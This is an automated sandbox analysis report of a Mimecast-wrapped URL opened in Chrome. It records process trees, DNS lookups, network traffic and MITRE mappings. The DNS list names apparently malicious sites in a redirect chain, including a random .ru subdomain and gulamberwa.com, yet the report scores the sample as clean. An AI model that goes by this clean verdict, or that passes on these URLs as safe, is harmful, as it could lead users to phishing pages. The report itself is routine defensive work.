Edit tour

Windows Analysis Report
https://login-uk.mimecast.com/auth/api/ttp/remediation/get-file/eNpNkN1u4jAQRt_F19C1J7bjIO0FbRdVgUqINhBWlSLbmYTQ_NDEoe2u9t3XLFqpN3Mx-nTmO_ObDGjHHquczAg_HTZmf3o4Hm8r48SvzZhu5m-u5tvdIj3tnmK6TuL7ah0v1pw_F3bouiWlSZ2sVjyB6CP-sdf3drcOTfpY3sZpGr4fFqn53MO-3D4shvlPRkV-vMOXb-V3MiFNR2aFrgeckL6wCmBwozFk1o51PSHa

Overview

General Information

Sample URL:	https://login-uk.mimecast.com/auth/api/ttp/remediation/get-file/eNpNkN1u4jAQRt_F19C1J7bjIO0FbRdVgUqINhBWlSLbmYTQ_NDEoe2u9t3XLFqpN3Mx-nTmO_ObDGjHHquczAg_HTZmf3o4Hm8r48SvzZhu5m-u5tvdIj3tnmK6TuL7ah0v1pw_
Analysis ID:	1562195

Detection

Score:	1
Range:	0 - 100
Whitelisted:	false
Confidence:	80%

Signatures

HTML page contains hidden javascript code

Stores files to the Windows start menu directory

Classification

Process Tree

System is w10x64_ra

chrome.exe (PID: 4204 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6664 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 --field-trial-handle=1912,i,14608015481515710271,16877189464625292732,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6284 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://login-uk.mimecast.com/auth/api/ttp/remediation/get-file/eNpNkN1u4jAQRt_F19C1J7bjIO0FbRdVgUqINhBWlSLbmYTQ_NDEoe2u9t3XLFqpN3Mx-nTmO_ObDGjHHquczAg_HTZmf3o4Hm8r48SvzZhu5m-u5tvdIj3tnmK6TuL7ah0v1pw_F3bouiWlSZ2sVjyB6CP-sdf3drcOTfpY3sZpGr4fFqn53MO-3D4shvlPRkV-vMOXb-V3MiFNR2aFrgeckL6wCmBwozFk1o51PSHaOW0PDbZO9_ZQndF1r9j6miYbXynLmAqzc-7nNMqAAmfMLyHCKNcolGQQWKBhaJBDHoRSBjbgMkDOVF4wSa0BRpXVyqAQWoUsClBHvlXRNv7IOLIKguPHzaktydcyRVVfv8UuJwGYAOlBVDAfs-PgugZ72-XoI3fJUqm5Uhdq4_yianTp7a_MM_ZD1Xkj5vlXxX_gMrNTvDpCJLyjn1OV_Yd9kWU-5bBv5JRSH1EBFSFIKsmfvw9bjwg?sid=0yP3OYOZ4_6FmiX5Tl-QJweyJlbmMiOiJBMTI4R0NNIiwiYWxnIjoiUEJFUzItSFMyNTYrQTEyOEtXIiwia2lkIjoiWHp4SjlxSThDSzF5X3diNmpPSGRvYU5JdGxNaTE3RW1nVEdIb2FRck9NMCIsInAycyI6IlZMU0R1QVBIMkhFMlpsR3ZHN1VjQUEiLCJwMmMiOjgxOTJ9.NNSb-i2N3Bf2U-FvH5rqFZPJzKEi5EjU.3HG08Ns1V5-swsl6.Z0fjgHd3i7UbYApL1vqjTD1q17kfuVFKD0HzKElaejJa0SQjRvZse2E09kHfijWimUTQ4dotEDjUEi4ZBquyDL70O12VolgNiA8Y-IWL5gYGzBpLd_SzHpQBlID-XI5zV1_fHwEcdJnwbxE4iGLZVoZ9gmWD2fA7F1S5mMxBMTC6rf753C0szwuKPWQgTeF1Xo-lJucBxpXfoDvPvRUSLJ83E0nqEIY7agPY3g3HYkP67cIZ_lB8TAOTVnDkqd7XLL5ALUji87bxaW4.-JLSMOtKVHAy9NYu3_v2BA&x-context-route=administration&fdl=1" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Yara Signatures

⊘No yara matches

Sigma Signatures

⊘No Sigma rule has matched

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

There are no malicious signatures, click here to show all signatures.

Source: https://central-synagogue.jimdosite.com/

HTTP Parser: Base64 decoded: 1732527211.000000

Source: https://aial.gulamberwa.com/ERA9sgQ/

HTTP Parser: No favicon

Source: unknown	HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.16:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.16:49725 version: TLS 1.2

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.10

Source: global traffic	DNS traffic detected: DNS query: login-uk.mimecast.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: fccdl.in
Source: global traffic	DNS traffic detected: DNS query: central-synagogue.jimdosite.com
Source: global traffic	DNS traffic detected: DNS query: jimdo-dolphin-static-assets-prod.freetls.fastly.net
Source: global traffic	DNS traffic detected: DNS query: fonts.jimstatic.com
Source: global traffic	DNS traffic detected: DNS query: jimdo-storage.freetls.fastly.net
Source: global traffic	DNS traffic detected: DNS query: at.prod.jimdo.systems
Source: global traffic	DNS traffic detected: DNS query: aial.gulamberwa.com
Source: global traffic	DNS traffic detected: DNS query: code.jquery.com
Source: global traffic	DNS traffic detected: DNS query: challenges.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: myqkz0xeyygfu46vw7rbgyj7tymnfyffdlgjxue07xli3ngcy4sae75xt1s.bfcgpixdwnw.ru
Source: global traffic	DNS traffic detected: DNS query: assets.onestore.ms
Source: global traffic	DNS traffic detected: DNS query: ajax.aspnetcdn.com
Source: global traffic	DNS traffic detected: DNS query: c.s-microsoft.com

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49695 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49696
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49695
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 49696 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.16:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.16:49725 version: TLS 1.2

Source: classification engine

Classification label: clean1.win@23/39@54/245

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 --field-trial-handle=1912,i,14608015481515710271,16877189464625292732,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://login-uk.mimecast.com/auth/api/ttp/remediation/get-file/eNpNkN1u4jAQRt_F19C1J7bjIO0FbRdVgUqINhBWlSLbmYTQ_NDEoe2u9t3XLFqpN3Mx-nTmO_ObDGjHHquczAg_HTZmf3o4Hm8r48SvzZhu5m-u5tvdIj3tnmK6TuL7ah0v1pw_F3bouiWlSZ2sVjyB6CP-sdf3drcOTfpY3sZpGr4fFqn53MO-3D4shvlPRkV-vMOXb-V3MiFNR2aFrgeckL6wCmBwozFk1o51PSHaOW0PDbZO9_ZQndF1r9j6miYbXynLmAqzc-7nNMqAAmfMLyHCKNcolGQQWKBhaJBDHoRSBjbgMkDOVF4wSa0BRpXVyqAQWoUsClBHvlXRNv7IOLIKguPHzaktydcyRVVfv8UuJwGYAOlBVDAfs-PgugZ72-XoI3fJUqm5Uhdq4_yianTp7a_MM_ZD1Xkj5vlXxX_gMrNTvDpCJLyjn1OV_Yd9kWU-5bBv5JRSH1EBFSFIKsmfvw9bjwg?sid=0yP3OYOZ4_6FmiX5Tl-QJweyJlbmMiOiJBMTI4R0NNIiwiYWxnIjoiUEJFUzItSFMyNTYrQTEyOEtXIiwia2lkIjoiWHp4SjlxSThDSzF5X3diNmpPSGRvYU5JdGxNaTE3RW1nVEdIb2FRck9NMCIsInAycyI6IlZMU0R1QVBIMkhFMlpsR3ZHN1VjQUEiLCJwMmMiOjgxOTJ9.NNSb-i2N3Bf2U-FvH5rqFZPJzKEi5EjU.3HG08Ns1V5-swsl6.Z0fjgHd3i7UbYApL1vqjTD1q17kfuVFKD0HzKElaejJa0SQjRvZse2E09kHfijWimUTQ4dotEDjUEi4ZBquyDL70O12VolgNiA8Y-IWL5gYGzBpLd_SzHpQBlID-XI5zV1_fHwEcdJnwbxE4iGLZVoZ9gmWD2fA7F1S5mMxBMTC6rf753C0szwuKPWQgTeF1Xo-lJucBxpXfoDvPvRUSLJ83E0nqEIY7agPY3g3HYkP67cIZ_lB8TAOTVnDkqd7XLL5ALUji87bxaW4.-JLSMOtKVHAy9NYu3_v2BA&x-context-route=administration&fdl=1"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 --field-trial-handle=1912,i,14608015481515710271,16877189464625292732,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Registry Run Keys / Startup Folder	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Registry Run Keys / Startup Folder	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
